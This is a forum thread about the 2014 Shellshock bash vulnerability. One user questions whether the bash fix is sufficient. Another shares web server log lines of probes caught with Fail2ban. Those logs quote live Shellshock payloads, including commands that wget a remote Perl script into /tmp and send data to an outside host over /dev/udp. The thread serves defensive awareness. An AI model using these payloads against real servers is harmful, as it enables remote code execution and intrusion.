Announcement

Collapse
No announcement yet.

Moved from Announcements

Collapse
This topic is closed.
X
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

    Moved from Announcements

    It's good that business is good for you!
    "A nation that is afraid to let its people judge the truth and falsehood in an open market is a nation that is afraid of its people.”
    – John F. Kennedy, February 26, 1962.

    #2
    I read this, about the fix for "shellshock":

    http://lxer.com/module/newswire/ext_link.php?rid=206219

    It may be that the latest fix is insufficient...

    I did get the bash update last night, but this may not address the problem noted in this link.


    @SteveRielly Can you confirm this?
    Kubuntu 24.11 64bit under Kernel 6.11.0, Hp Pavilion, 6MB ram. Stay away from all things Google...

    Comment


      #3
      I've been keeping track of naughty "shellshock" probes using Fail2ban...

      https://samhobbs.co.uk/2014/09/shell...using-fail2ban

      I've been surprised by how many times I've been probed already

      Here are just a few examples:

      Code:
      24.251.197.244 - - [25/Sep/2014:09:55:10 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
      Code:
      109.95.210.196 - - [25/Sep/2014:17:52:45 +0100] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 301 565 "-" "() { :;}; /bin/bash -c \"/usr/bin/wget http://singlesaints.com/firefile/temp?h=samhobbs.co.uk -O /tmp/a.pl\""
      Code:
      166.78.61.142 - - [25/Sep/2014:17:54:03 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444"
      Code:
      93.103.21.231 - - [26/Sep/2014:03:17:21 +0100] "GET / HTTP/1.1" 301 513 "-" "() { :;}; wget 'http://taxiairportpop.com/s.php?s=http://samhobbs.co.uk/'"
      To be honest, I'm suprised at how quickly the script kiddies have moved on this one.
      samhobbs.co.uk

      Comment

      Working...
      X